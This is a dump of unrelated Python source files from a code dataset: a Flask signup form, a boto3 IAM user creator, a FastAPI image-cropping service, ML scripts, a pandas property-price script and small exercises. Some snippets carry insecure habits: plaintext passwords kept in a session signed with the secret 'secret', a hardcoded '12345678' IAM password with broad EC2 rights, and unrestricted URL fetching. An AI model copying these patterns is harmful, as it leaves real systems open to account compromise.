text stringlengths 8 6.05M |
|---|
#!/usr/bin/python
def main():
current = map(int, reversed(raw_input().split(':')))
explosion = map(int, reversed(raw_input().split(':')))
carry = 0
result = []
for c0, c1, c2 in zip(current, explosion, [60, 60, 24]):
r = c1 - c0 - carry
if r < 0:
r += c2
carry = 1
else:
carry = 0
result.append(r)
if 0 == result[2] and 0 == result[1] and 0 == result[0]:
result = [0, 0, 24]
print '{:02}:{:02}:{:02}'.format(result[2], result[1], result[0])
if '__main__' == __name__:
main()
|
import requests
response = requests.get('http://img.ivsky.com/img/tupian/pre/202003/11/bianjing_muyangquan-008.jpg')
print(response.text) |
import random
import argparse
parser = argparse.ArgumentParser(description='Process coordinates.')
parser.add_argument('--min_lon', metavar='N', type=int,
help='max_lan is a required')
parser.add_argument('--max_lon', metavar='N', type=int,
help='max_lon is a required')
parser.add_argument('--min_lan', metavar='N', type=int,
help='min_lan is a required')
parser.add_argument('--max_lan', metavar='N', type=int,
help='max_lan is a required')
args = parser.parse_args()
def generate_grid(min_lon, max_lon, min_lan, max_lan):
file = open("./src/main/resources/grid.txt", "w")
for x in range(min_lon, max_lon):
for y in range(min_lan, max_lan):
val = str(x) + ',' + str(y) + ',' + str(random.uniform(2.0, 30.0)) + '\n'
file.write(val)
def generate_user(min_lon, max_lon, min_lan, max_lan):
file = open("./src/main/resources/user_labels.txt", "w")
for x in range(1, 1000000):
val = str(x) + ',' + str(round(random.uniform(min_lon, max_lon), 4)) + ',' + str(round(random.uniform(min_lan, max_lan), 4)) + '\n'
file.write(val)
if __name__ == '__main__':
generate_grid(args.min_lon, args.max_lon, args.min_lan, args.max_lan)
generate_user(args.min_lon, args.max_lon, args.min_lan, args.max_lan) |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pdb
from django.shortcuts import render
from django.views.generic import ListView, DetailView
from movie_tracker.models import *
from django.core.paginator import Paginator
class Index(ListView):
model = Actor
template_name = 'actors/index.html'
context_object_name = 'actors'
paginate_by = 10
def get_queryset(self):
name = self.request.GET.get('actor','')
return self.model.objects.filter(name__icontains=name)
class Show(DetailView):
model = Actor
template_name = 'actors/show.html'
context_object_name = 'actor'
|
# USAGE
# python index_images.py --images ..\..\datasets\caltech101 --tree vptree.pickle --hashes hashes.pickle
from pyimagesearch.parallel_hashing import *
from imutils import paths
import argparse
import pickle
import vptree
import cv2
# construct argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--images', required=True, type=str, help='Path to input directory of images')
ap.add_argument('-t', '--tree', required=True, type=str, help='Path to output VP-tree')
ap.add_argument('-a', '--hashes', required=True, type=str, help='Path to output hashes directory')
args = vars(ap.parse_args())
# Grab the paths to the input images and initialize the hashes
image_paths = list(paths.list_images(args['images']))
hashes = {}
# loop over the image paths
for i, image_path in enumerate(image_paths):
# load the input image
if (i + 1) % 100 == 0:
print(f'[INFO] processing images {i + 1}/{len(image_paths)}...')
image = cv2.imread(image_path)
# compute the hash for the image and convert it
h = dhash(image)
h = convert_hash(h)
# update the hashes dictionary
l = hashes.get(h, [])
l.append(image_path)
hashes[h] = l
# build the VP-tree
print('[INFO] building VP-Tree...')
points = list(hashes.keys())
tree = vptree.VPTree(points, hamming)
# serialize the Vp-Tree to disk
print('[INFO] serializing VP-Tree...')
f = open(args['tree'], 'wb')
f.write(pickle.dumps(tree))
f.close()
# serialize the hashes to dictionary
print('[INFO] serialzing hashes...')
f = open(args['hashes'], 'wb')
f.write(pickle.dumps(hashes))
f.close() |
"""A WebSocket handler for Treadmill state.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import os
from treadmill import schema
from treadmill.websocket import _utils
from treadmill import yamlwrapper as yaml
_LOGGER = logging.getLogger(__name__)
class RunningAPI(object):
"""Handler for /running topic.
"""
def __init__(self):
@schema.schema({'$ref': 'websocket/state.json#/message'})
def subscribe(message):
"""Return filter based on message payload.
"""
parsed_filter = _utils.parse_message_filter(message['filter'])
return [('/running', parsed_filter.filter)]
def on_event(filename, _operation, content):
"""Event handler.
"""
if not filename.startswith('/running/'):
return
appname = os.path.basename(filename)
return {
'topic': '/running',
'name': appname,
'host': content,
}
self.subscribe = subscribe
self.on_event = on_event
class ScheduledAPI(object):
"""Handler for /scheduled topic.
"""
def __init__(self):
@schema.schema({'$ref': 'websocket/state.json#/message'})
def subscribe(message):
"""Return filter based on message payload.
"""
parsed_filter = _utils.parse_message_filter(message['filter'])
return [('/scheduled', parsed_filter.filter)]
def on_event(filename, _operation, content):
"""Event handler.
"""
if not filename.startswith('/scheduled/'):
return
appname = os.path.basename(filename)
manifest = None
if content:
manifest = yaml.load(content)
return {
'topic': '/scheduled',
'name': appname,
'manifest': manifest,
}
self.subscribe = subscribe
self.on_event = on_event
def init():
"""API module init.
"""
return [
('/running', RunningAPI(), []),
('/scheduled', ScheduledAPI(), []),
]
|
from flask import Flask, render_template, redirect, request, session, flash
import re
import datetime
app = Flask(__name__)
app.secret_key = "secret"
email_regex = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
@app.route("/")
def root():
today = datetime.date.today()
todayDate = str(today.year) + "-" + str(today.month) + "-" + str(today.day)
todayList = todayDate.split("-")
session["maxday"] = todayList
return render_template("index.html", maxday=session["max"])
@app.route("/process", methods=["POST"])
def process():
if len(request.form["email"]) < 1 and len(request.form["fName"]) < 1 and len(request.form["lName"]) < 1 and len(request.form["bday"]) < 1 and len(request.form["pword"]) < 1 and len(request.form["confirm"]) < 1:
flash("Please fill out the form.")
return redirect("/")
if len(request.form["email"]) < 1:
flash("Email cannot be blank!")
email = False
elif not email_regex.match(request.form["email"]):
flash("Invalid email address!")
email = False
else:
session["email"] = request.form["email"]
email = True
if len(request.form["fName"]) < 1 or len(request.form["lName"]) < 1:
flash("Name cannot be blank!")
name = False
elif not request.form["fName"].isalpha() or not request.form["lName"].isalpha():
flash("Names must not contain numbers.")
name = False
else:
session["fName"] = request.form["fName"]
session["lName"] = request.form["lName"]
name = True
if len(request.form["pword"]) < 8:
flash("Password must be more than 8 characters.")
pword = False
elif request.form["pword"].islower():
flash("Password must contain at least 1 uppercase letter.")
pword = False
elif request.form["pword"].isalpha():
flash("Password must contain at least one number.")
pword = False
elif request.form["pword"] != request.form["confirm"]:
flash("Password and password confirmation must match.")
pword = False
else:
session["pword"] = request.form["pword"]
session["confirm"] = request.form["confirm"]
pword = True
if len(request.form["bday"]) < 1:
flash("Must enter a birthdate.")
bday = False
elif request.form["bday"] != session["maxday"]:
flash("Date must not be in the past.")
bday = False
else:
session["bday"] = request.form["bday"]
bday = True
if email == False and name == True and pword == True and bday == True:
return render_template("index.html", fName=session["fName"], lName=session["lName"], pword=session["pword"], confirm=session["confirm"], bday=session["bday"])
elif email == True and name == False and pword == True and bday == True:
return render_template("index.html", email=session["email"], pword=session["pword"], confirm=session["confirm"], bday=session["bday"])
elif email == True and name == True and pword == False and bday == True:
return render_template("index.html", email=session["email"], fName=session["fName"], lName=session["lName"], bday=session["bday"])
elif email == True and name == True and pword == True and bday == False:
return render_template("index.html", email=session["email"], fName=session["fName"], lName=session["lName"], pword=session["pword"], confirm=session["confirm"])
elif email == False and name == False and pword == True and bday == True:
return render_template("index.html", pword=session["pword"], confirm=session["confirm"], bday=session["bday"])
elif email == True and name == False and pword == False and bday == True:
return render_template("index.html", email=session["email"], bday=session["bday"])
elif email == True and name == True and pword == False and bday == False:
return render_template("index.html", email=session["email"], fName=session["fName"], lName=session["lName"])
elif email == False and name == True and pword == False and bday == True:
return render_template("index.html", fName=session["fName"], lName=session["lName"], bday=session["bday"])
elif email == False and name == True and pword == True and bday == False:
return render_template("index.html", fName=session["fName"], lName=session["lName"], pword=session["pword"], confirm=session["confirm"])
elif email == True and name == False and pword == False and bday == True:
return render_template("index.html", email=session["email"], bday=session["bday"])
elif email == True and name == False and pword == True and bday == False:
return render_template("index.html", email=session["email"], pword=session["pword"], confirm=session["confirm"])
elif email == False and name == False and pword == False and bday == True:
return render_template("index.html", bday=session["bday"])
elif email == False and name == True and pword == False and bday == False:
return render_template("index.html", fName=session["fName"], lName=session["lName"])
elif email == False and name == False and pword == True and bday == False:
return render_template("index.html", pword=session["pword"], confirm=session["confirm"])
elif email == True and name == False and pword == False and bday == False:
return render_template("index.html", email=session["email"])
else:
return render_template("index.html", email=session["email"], fName=session["fName"], lName=session["lName"], pword=session["pword"], confirm=session["confirm"], bday=session["bday"])
app.run(debug=True) |
# Submitter: loganw1(Wang, Logan)
import re, traceback, keyword
def pnamedtuple(type_name, field_names, mutable = False, defaults = {}):
def show_listing(s):
for line_number, text_of_line in enumerate(s.split('\n'),1):
print(f' {line_number: >3} {text_of_line.rstrip()}')
# put your code here
# bind class_definition (used below) to the string constructed for the class
def is_legal_name(s):
if type(s) == str or type(s) == int or type(s) == float:
s= str(s)
if ',' in s:
l= s.split(',') #splits if field_names
else:
l = s.split()
for i in l:
i=i.strip()
if i in keyword.kwlist:
raise SyntaxError(f'pcollections.pnamedtuple.is_legal_name: String s: ' + s + ' is not a legal name, is Python keyword')
else:
z = re.match('^[a-zA-Z][\w]*$', i)
if z:
pass
else:
raise SyntaxError(f'pcollections.pnamedtuple.is_legal_name: String s: ' + s + ' is not a legal name, must start with alphabetical character and be followed by alphanumeric or underscore characters')
return True
elif type(s) == list:
for i in s:
if i in keyword.kwlist:
raise SyntaxError(
f'pcollections.pnamedtuple.is_legal_name: String s: ' + s + ' is not a legal name, is Python keyword')
else:
z = re.match('^[a-zA-Z][\w]*$', i)
if z:
pass
else:
raise SyntaxError(
f'pcollections.pnamedtuple.is_legal_name: String s: ' + s + ' is not a legal name, must start with alphabetical character and be followed by alphanumeric or underscore characters')
return True
raise SyntaxError()
if is_legal_name(type_name): #Doesn't do anything if legal name, raises SyntaxError otherwise
pass
fields=[]
if is_legal_name(field_names): #If all legal names, constructs list of fields
if type(field_names) == str:
if ',' in field_names:
l= field_names.split(',') #splits if field_names
else:
l = field_names.split()
for i in l:
if i not in fields: #prevent dups
fields.append(i.strip())
elif type(field_names) == list:
fields = list(field_names)
#Checking default params
for key in defaults.keys():
if key not in fields:
raise SyntaxError(f'pcollections.pnamedtuple: key: ' + key + ' from defaults does not exist in this class"s fields: ' + str(fields))
def gen_init(fields,defaults) ->str:
s= " def __init__(self, "
for field in fields:
if field in defaults.keys():
s += str(field) +'=' + str(defaults[field])+', '
else:
s += str(field) +', '
s = s[:-1] + '):\n'
for field in fields:
s+= f' self.{field} = {field}\n'
return s.rstrip()
def gen_repr():
s = " def __repr__(self):\n"
s+=f" s = '{type_name}('\n"
s+=f" for key,value in self.__dict__.items():\n"
s+=f" s += str(key) + '=' + str(value) + ','\n"
s+=f" return s[:-1] + ')'"
return s
def gen_accessors(fields):
s=''
for field in fields:
field_getter = f'''\
def get_{field}(self):
return self.{field}
'''
s+= field_getter
return s
def gen_get_item():
s=f'''\
def __getitem__(self, x):
if type(x) == int and x < len(self._fields):
o = 'self.get_' + str(self._fields[x])+'()'
return eval(o)
elif type(x) == str and x in self._fields:
o = 'self.get_' + str(x)+'()'
return eval(o)
else:
raise IndexError('x: ' + str(x) + ' is either out of bounds or not an existing field')
'''
return s
def gen_eq():
s=f'''\
def __eq__(self, x):
if type(x) != type(self):
return False
if len(self._fields) != len(x._fields):
return False
for item in self._fields:
if self.__getitem__(item) != x.__getitem__(item):
return False
return True
'''
return s
def gen_asdict():
s = '''\
def _asdict(self):
return {field:self.__getitem__(field) for field in self._fields}
'''
return s
def gen_make():
s=f'''\
def _make(iterable):
return {type_name}(*iterable)
'''
return s
def gen_replace():
s = f'''\
def _replace(self, **kargs):
for item in kargs:
if item not in self._fields:
raise TypeError()
if self._mutable:
for item in kargs:
self.__dict__[item] = kargs[item]
return None
else:
d = dict()
for k,v in self.__dict__.items():
d[k] = v
for item in kargs:
d[item] = kargs[item]
l = [value for value in d.values()]
return {type_name}._make(l)
'''
return s
# def gen_setattr():
# s = f'''\
# def __setattr__(self, name, value):
# if _mutable:
# self.__dict__[name] = value
# else:
# raise AttributeError('not mutable')
#'''
# return s
class_definition = f'''\
class {type_name}:
_fields = {fields}
_mutable = {mutable}
{gen_init(fields,defaults)}
{gen_repr()}
{gen_accessors(fields)}
{gen_get_item()}
{gen_eq()}
{gen_asdict()}
{gen_make()}
{gen_replace()}
'''
# Debugging aid: uncomment show_listing, displays source code for the class
# show_listing(class_definition)
# Execute class_definition's str within name_space; followed by binding the
# attribute source_code to the class_definition; after the try+except
# return the created class object; if there were any syntax errors, show
# the class and also show the error in the except clause
name_space = dict( __name__ = f'pnamedtuple_{type_name}' )
try:
exec(class_definition,name_space)
name_space[type_name].source_code = class_definition
except (TypeError,SyntaxError):
show_listing(class_definition)
traceback.print_exc()
return name_space[type_name]
if __name__ == '__main__':
# Test simple pnamedtuple below in script: Point=pnamedtuple('Point','x,y')
#TODO REMOVE BELOW
#driver tests
import driver
driver.default_file_name = 'bscp3W21.txt'
# driver.default_show_exception_message= True
# driver.default_show_traceback= True
driver.driver()
|
def fib(x):
'''
:param x: assume x an int >=0
:return:Fibonacci of x
'''
assert type(x)==int and x >=0
if x==0 or x==1:
return 1
else:
return fib(x-1)+fib(x-2)
print fib(11) |
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import LSTM
#wholeSequence = [[0,0,0,0,0,0,0,0,0,2,1],
# [0,0,0,0,0,0,0,0,2,1,0],
# [0,0,0,0,0,0,0,2,1,0,0],
# [0,0,0,0,0,0,2,1,0,0,0],
# [0,0,0,0,0,2,1,0,0,0,0],
# [0,0,0,0,2,1,0,0,0,0,0],
# [0,0,0,2,1,0,0,0,0,0,0],
# [0,0,2,1,0,0,0,0,0,0,0],
# [0,2,1,0,0,0,0,0,0,0,0],
# [2,1,0,0,0,0,0,0,0,0,0]]
#
## Input sequence
#data = [[0,0,0,0,0,0,0,0,0,2,1],
# [0,0,0,0,0,0,0,0,2,1,0],
# [0,0,0,0,0,0,0,2,1,0,0],
# [0,0,0,0,0,0,2,1,0,0,0],
# [0,0,0,0,0,2,1,0,0,0,0],
# [0,0,0,0,2,1,0,0,0,0,0],
# [0,0,0,2,1,0,0,0,0,0,0],
# [0,0,2,1,0,0,0,0,0,0,0],
# [0,2,1,0,0,0,0,0,0,0,0]]
#
#target = [[0,0,0,0,0,0,0,0,2,1,0],
# [0,0,0,0,0,0,0,2,1,0,0],
# [0,0,0,0,0,0,2,1,0,0,0],
# [0,0,0,0,0,2,1,0,0,0,0],
# [0,0,0,0,2,1,0,0,0,0,0],
# [0,0,0,2,1,0,0,0,0,0,0],
# [0,0,2,1,0,0,0,0,0,0,0],
# [0,2,1,0,0,0,0,0,0,0,0],
# [2,1,0,0,0,0,0,0,0,0,0]]
#
### Preprocess Data:
#data = np.array(data, dtype=np.float32) # Convert to NP array.
#target = np.array(target, dtype=np.float32) # Convert to NP array.
#
#wholeSequence = np.array(wholeSequence, dtype=np.float32) # Convert to NP array.
#data = wholeSequence[:-1] # all but last
#target = wholeSequence[1:] # all but first
model = None
#data = wholeSequence[:-1] # all but last
#target = wholeSequence[1:] # all but first
def train(data, target = None):
global model
width = (len(data[0]))
height = (len(data))
data = np.array(data, dtype=np.float32)
data = data.reshape((1, height, width))
if not target is None:
target = np.array(target, dtype=np.float32)
target = target.reshape((1, height, width))
# Build Model
if model == None:
model = Sequential()
model.add(LSTM(width, input_shape=(height, width),
unroll=True, return_sequences=True))
model.add(LSTM(1024, return_sequences=True))
model.add(Dense(width))
model.compile(loss='mean_absolute_error', optimizer='adam')
if not target is None:
model.fit(data, target, nb_epoch=220, batch_size=1, verbose=2)
else:
predictions = model.predict(data)
return np.rint(np.absolute(predictions))
return None
# model.summary()
#data = [
# [0,1,0,1,0,1], [0,0,1,1,0,0], [0,0,1,1,0,0], [0,0,1,1,0,0],
# [0,0,1,1,0,0], [0,0,1,1,0,0], [0,1,1,0,0,0], [0,0,1,1,0,0],
# [0,1,1,0,0,0], [0,1,1,0,0,0], [0,1,1,0,0,0], [0,0,1,1,0,0]]
#
#target = [
# [0,1,0,1,1,1], [0,1,1,1,0,0], [0,1,1,1,0,0], [0,1,1,1,0,0],
# [0,0,1,1,0,0], [0,1,1,1,0,1], [0,0,1,1,0,1], [0,1,1,1,0,1],
# [0,1,1,1,0,1], [0,1,1,1,0,1], [0,0,1,1,0,0], [0,0,1,1,0,0]]
#
#train(data, target)
#train(target, data)
#train(data, target)
#train(target, data)
#print (train(target))
#print (train(data))
|
from aiogram import types
from aiogram.dispatcher.filters.builtin import CommandStart
from loader import dp
from keyboards.inline.test1 import test
@dp.message_handler(CommandStart())
async def bot_start(message: types.Message):
await message.answer(f"Приветствую тебя, {message.from_user.full_name}!",reply_markup=test )
|
import boto3
def create_iam(user_name, passwd):
"""
A function to create iam user with password and access keys
assign variable to all boto functions to get the response from it
"""
iam = boto3.client('iam', region_name='ap-south-1')
usernames = []
# get all the usernames
response = iam.list_users()['Users']
for res in response:
usernames.append(res['UserName'])
# check if username already exists
for uname in usernames:
if uname == user_name:
print("User Exists")
exit(0)
# creating user
iam.create_user(
UserName=user_name,
)
# setting the user name and password
iam.create_login_profile(
UserName=user_name,
Password=passwd,
PasswordResetRequired=True
)
# create the access key for the user
response = iam.create_access_key(
UserName=user_name
)
print(response)
# attach the policy for the user to determine the access you want to grant
iam.attach_user_policy(
UserName=user_name,
PolicyArn='arn:aws:iam::aws:policy/AmazonEC2FullAccess'
)
create_iam('sampleuser5', '12345678')
|
# -*- coding: utf-8 -*-
import itertools
class Solution:
def largestTriangleArea(self, points):
result = 0
for (x_a, y_a), (x_b, y_b), (x_c, y_c) in itertools.combinations(points, 3):
area = abs((x_a - x_c) * (y_b - y_a) - (x_a - x_b) * (y_c - y_a)) / 2
if area > result:
result = area
return result
if __name__ == "__main__":
solution = Solution()
assert 2 == solution.largestTriangleArea([[0, 0], [0, 1], [1, 0], [0, 2], [2, 0]])
assert 0.5 == solution.largestTriangleArea([[1, 0], [0, 0], [0, 1]])
|
# Rutherford (2001) Examples, cross-checked results:
#
# independent measure (p. 24):
# 3 groups, 8 subjects each
## SS df MS F p
##_________________________________________________________
##A 112.0000 2 56.0000 22.6154*** .0000
##subject(A) 52.0000 21 2.4762
##_________________________________________________________
##Total 164 23
#
#
# repeated measures (p. 72):
# 8 s on 3 blocks
## SS df MS F p
##_____________________________________________________________
##A 112.0000 2 56.0000 20.6316*** .0001
##subject 14.0000 7 2.0000
##A x subject 38.0000 14 2.7143
##_____________________________________________________________
##Total 164 23
##
import numpy as np
from eelbrain import *
Y = Var([7, 3, 6, 6, 5, 8, 6, 7,
7, 11, 9, 11, 10, 10, 11, 11,
8, 14, 10, 11, 12, 10, 11, 12],
name='Y')
A = Factor(8*'a' + 8*'b' + 8*'c', name='A')
# Independent Measures, as mixed effects model:
subject = Factor(range(24), name='subject', random=True)
aim = test.anova(Y, A + subject(A), title="Independent Measures Full Model")
print aim
# as fixed effects model
print test.anova(Y, A, title="Independent Measures")
# Repeated Measures:
subject = Factor(np.array(range(8)*3), name='subject', random=True)
arm = test.anova(Y, A * subject, title="Repeated Measures")
print arm
|
'''
URI 1075.py
Resto 2
'''
n = int(input())
while n >= 10000:
n = int(input())
for i in range (1, 10001):
if i % n == 2:
print(i)
|
import re
import json
default = 0x3F76E4
table = {
'Swamp': 0x617B64,
'River': 0x3F76E4,
'Ocean': 0x3F76E4,
'Lukewarm Ocean': 0x45ADF2,
'Warm Ocean': 0x43D5EE,
'Cold Ocean': 0x3D57D6,
'Frozen River': 0x3938C9,
'Frozen Ocean': 0x3938C9,
}
def parse_cpp(path):
pattern = re.compile(r'\s*\{\s*/\*\s*(\d{1,3})\s*\*/\s*\"(.+)\",\s*([-\d\.]+)f,\s*([-\d\.]+)f,\s*(0x[\dABCDEF]{6}),\s*(0x[\dABCDEF]{6})\s*\},\s*')
data = list()
with open(path) as ifile:
mark = 0
line = ifile.readline()
while line is not None:
if mark == 0 and line.startswith('Biome gBiomes[256]={'):
mark = 1
if mark > 0 and line.startswith('};'):
mark = -1
break
if mark > 0:
m = pattern.match(line)
if m is not None:
s = (
int(m.group(1)),
m.group(2),
float(m.group(3)),
float(m.group(4)),
int(m.group(5), 16),
int(m.group(6), 16),
table.get(m.group(2), default)
)
print(s)
data.append(s)
line = ifile.readline()
return data
def gen_source(path, data):
with open(path, 'w') as ofile:
ofile.write('// generate automatically\n')
ofile.write('pub const BIOME_DATA: [(&\'static str, f32, f32, u32); 256] = [\n')
ofile.write(' // (name, temperature, rainfall, water_color) \n')
for s in data:
ofile.write(' (/* %3d */ %-36s, %.2f, %.2f, 0x%X),\n' % (s[0], '"' + s[1] + '"', s[2], s[3], s[6]))
ofile.write('];\n')
ofile.write('\n')
ofile.write('pub const COLORMAP_GRASS: &\'static [u8] = include_bytes!("grass.png");\n')
ofile.write('\n')
ofile.write('pub const COLORMAP_FOLIAGE: &\'static [u8] = include_bytes!("foliage.png");\n')
ofile.write('\n')
if __name__ == "__main__":
data = parse_cpp('mc-render/biomes.cpp')
gen_source('mc-render/src/assets/biome.rs', data)
|
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
#Read in data
MNIST = input_data.read_data_sets('MNIST_data/',one_hot = True)
#specify parameters
learning_rate =0.01
batch_size = 128
n_epoch = 25
# placeholders for input and label
X = tf.placeholder(tf.float32,[batch_size ,784],name = "image")
Y = tf.placeholder(tf.float32, [batch_size ,10],name = "label")
# model specification
w = tf.Variable(tf.random_normal(shape = [784,10], stddev =0.01),name = "weights")
b = tf.Variable(tf.zeros([1,10]),name = "bias")
Y_pred = tf.matmul(X,w) + b
#define the loss function
entropy = tf.nn.softmax_cross_entropy_with_logits(logits=Y_pred,labels =Y)
loss = tf.reduce_mean(entropy)
#optimization
optimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate).minimize(loss)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
n_batches = MNIST.train.num_examples/batch_size
for e in range(n_epoch):
for _ in range(n_batches):
X_batch,Y_batch = MNIST.train.next_batch(batch_size)
sess.run([optimizer,loss], feed_dict={X:X_batch, Y:Y_batch})
#print (sess.run(loss,feed_dict= {X:X_batch,Y:Y_batch}))
|
from monilog import Statistics
def test_get_mean_list():
stats = Statistics(10)
assert stats._get_mean_list([1, 2]) == 1.5
def test_statistics():
stats = Statistics(10)
assert isinstance(stats([{
'ip': '127.0.0.1',
'time': '01/Mar/2020:16:50:04',
'method': 'GET',
'sections': ['api', 'user'],
'section': 'api',
'code': '304',
'size': 33256
}]), str)
|
import logging
import os
import tempfile
from io import BytesIO
from uuid import uuid4
import requests
import smartcrop
from PIL import Image
from fastapi import FastAPI
from opentelemetry import trace
from opentelemetry.exporter.jaeger.thrift import JaegerExporter
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from starlette.responses import StreamingResponse
from trace_helper import trace_function
REDIS_HOST = os.environ.get('REDIS_HOST', 'localhost')
REDIS_PORT = os.environ.get('REDIS_PORT', 6379)
REDIS_DB = os.environ.get('REDIS_DB', 0)
BUCKET_NAME = os.environ.get('BUCKET_NAME', 'awskrug-cday')
def make_key() -> str:
return uuid4().hex[:8]
app = FastAPI()
tracer = trace.get_tracer(__name__)
exporter = JaegerExporter()
span_processor = BatchSpanProcessor(exporter)
trace.get_tracer_provider().add_span_processor(span_processor)
@app.get('/crop')
@trace_function(tracer)
def crop(url: str, width: int, height: int):
with tracer.start_as_current_span('crop') as span:
span.set_attributes(dict(
url=url,
width=width,
height=height
))
temp_file = make_key()
with tempfile.TemporaryDirectory() as temp_dir:
download_file = os.path.join(temp_dir, temp_file)
file_download(url, download_file)
# 이미지 변환
with Image.open(download_file) as image:
# 이미지 변환
img = crop_handler(image, width, height)
# 포맷 변환
raw_img = save_to_jpeg(img)
return StreamingResponse(BytesIO(raw_img), media_type="image/jpeg")
@app.get('/resize')
@trace_function(tracer)
def resize(url: str, width: int, height: int):
temp_file = make_key()
with tempfile.TemporaryDirectory() as temp_dir:
download_file = os.path.join(temp_dir, temp_file)
file_download(url, download_file)
# 이미지 변환
with Image.open(download_file) as image:
# 이미지 변환
img = crop_handler(image, width, height)
# 포맷 변환
raw_img = save_to_jpeg(img)
return StreamingResponse(BytesIO(raw_img), media_type="image/jpeg")
@app.get('/smartcrop')
@trace_function(tracer)
def smart_crop(url: str, width: int, height: int):
temp_file = make_key()
with tempfile.TemporaryDirectory() as temp_dir:
download_file = os.path.join(temp_dir, temp_file)
file_download(url, download_file)
# 이미지 변환
with Image.open(download_file) as image:
# 이미지 변환
img = smart_crop_handler(image, width, height)
# 포맷 변환
raw_img = save_to_jpeg(img)
return StreamingResponse(BytesIO(raw_img), media_type="image/jpeg")
@trace_function(tracer)
def file_download(url: str, target_path: str):
logging.info(f"start download {url=} to {target_path=}")
r = requests.get(url, stream=True)
r.raise_for_status()
with open(target_path, 'wb') as f:
for block in r.iter_content(1024):
if not block:
break
f.write(block)
logging.info(f"finished download")
@trace_function(tracer)
def resize_handler(image: Image, width: int, height: int):
with tracer.start_as_current_span('resize_handler') as span:
span.set_attributes(dict(
width=width,
height=height
))
image.thumbnail((width, height), Image.ANTIALIAS)
return image
@trace_function(tracer)
def crop_handler(image: Image, width: int, height: int, **kwargs):
origin_width = image.size[0]
origin_height = image.size[1]
origin_aspect = origin_width / float(origin_height)
target_aspect = width / float(height)
if origin_aspect > target_aspect:
# crop the left and right edges:
new_width = int(target_aspect * origin_height)
offset = (origin_width - new_width) / 2
resize = (offset, 0, origin_width - offset, origin_height)
else:
# crop the top and bottom:
new_height = int(origin_width / target_aspect)
offset = (origin_height - new_height) / 2
resize = (0, offset, origin_width, origin_height - offset)
img = image.crop(resize)
img.thumbnail((width, height), Image.ANTIALIAS)
return img
@trace_function(tracer)
def smart_crop_handler(image: Image, width: int, height: int, **kwargs):
sc = smartcrop.SmartCrop()
origin_width = image.size[0]
origin_height = image.size[1]
origin_aspect = origin_width / float(origin_height)
target_aspect = width / float(height)
if origin_aspect > target_aspect:
new_width = int(target_aspect * origin_height)
crop_size = (new_width, origin_height)
else:
new_height = int(origin_width / target_aspect)
crop_size = (origin_width, new_height)
if image.mode != 'RGB':
image = image.convert('RGB')
with tracer.start_as_current_span('smart_croping') as span:
result = sc.crop(image, *crop_size)['top_crop']
resize = (
result['x'],
result['y'],
result['width'] + result['x'],
result['height'] + result['y']
)
img = image.crop(resize)
img.thumbnail((width, height), Image.ANTIALIAS)
return img
@trace_function(tracer)
def save_to_jpeg(image):
if image.mode != 'RGB':
image = image.convert('RGB')
with BytesIO() as f:
image.save(f, format='JPEG')
return f.getvalue()
|
import gzip
import os
import pandas as pd
pd.set_option('display.float_format', lambda x: '%.5f' % x)
# pd.set_option('display.max_columns', None)
pd.set_option('display.width', 120)
pd.set_option('display.max_rows', 100)
pd.set_option('display.min_rows', 30)
def appartement_preparation(df: pd.DataFrame) -> pd.DataFrame:
# keep only columns for work on
df = df[["nature_mutation", "id_mutation", "date_mutation", "valeur_fonciere", "type_local",
"surface_reelle_bati", "nombre_pieces_principales", "surface_terrain", "code_commune",
"code_departement", "code_postal", "longitude", "latitude"]]
# keep only sales
df = df[df["nature_mutation"] == "Vente"]
# deleting all sales with multiple lots to keep it simple and more accurate
df = df.drop_duplicates(subset=["id_mutation"], keep=False)
# select only appartments
df = df[df["type_local"] == "Appartement"]
# keep only appartements without lands
df = df[df["surface_terrain"].isna()]
# calculate price per square metter and delete the most aberants entries
df["prix_m2"] = df["valeur_fonciere"] / df["surface_reelle_bati"]
df = df.loc[(df["prix_m2"] > 500) & (df["prix_m2"] < 20000),:]
# keep only appartements greater than minimum viable
df = df[df["surface_reelle_bati"] >= 9]
# convert code departement to string mainly because of 2A and 2B departement and for geojson mapping
df["code_departement"] = df["code_departement"].astype(str)
# put a "0" in front of first 9 departements for mapping data and joins for later
df["code_departement"] = df["code_departement"].apply(lambda x: x if len(x)>1 else "0"+x)
df = df[["date_mutation", "valeur_fonciere", "surface_reelle_bati", "nombre_pieces_principales",
"code_departement", "code_postal" ,"code_commune", "longitude", "latitude", "prix_m2"]]
return df
def maison_preparation(df: pd.DataFrame) -> pd.DataFrame:
# keep only columns for work on
df = df[["nature_mutation", "id_mutation", "date_mutation", "valeur_fonciere", "type_local",
"surface_reelle_bati", "nombre_pieces_principales", "surface_terrain", "code_commune",
"code_departement", "code_postal", "longitude", "latitude"]]
# keep only sales
df = df[df["nature_mutation"] == "Vente"]
# deleting all sales with multiple lots to keep it simple and more accurate
df = df.drop_duplicates(subset=["id_mutation"], keep=False)
# select only appartments
df = df[df["type_local"] == "Maison"]
# calculate price per square metter and delete the most aberants entries
df["prix_m2"] = df["valeur_fonciere"] / df["surface_reelle_bati"]
df = df.loc[(df["prix_m2"] > 500) & (df["prix_m2"] < 20000),:]
# keep only appartements greater than minimum viable
df = df[df["surface_reelle_bati"] >= 9]
# convert code departement to string mainly because of 2A and 2B departement and for geojson mapping
df["code_departement"] = df["code_departement"].astype(str)
# put a "0" in front of first 9 departements for mapping data and joins for later
df["code_departement"] = df["code_departement"].apply(lambda x: x if len(x)>1 else "0"+x)
df = df[["date_mutation", "valeur_fonciere", "surface_reelle_bati", "nombre_pieces_principales", "surface_terrain",
"code_departement", "code_postal" ,"code_commune", "longitude", "latitude", "prix_m2"]]
return df
def data_work(preparation_function:callable) -> tuple:
def custom_agg(x) -> pd.Series:
d = {}
d[f"{year}_median"] = x["prix_m2"].median()
d[f"{year}_decile_1"] = x["prix_m2"].quantile(0.1)
d[f"{year}_decile_9"] = x["prix_m2"].quantile(0.9)
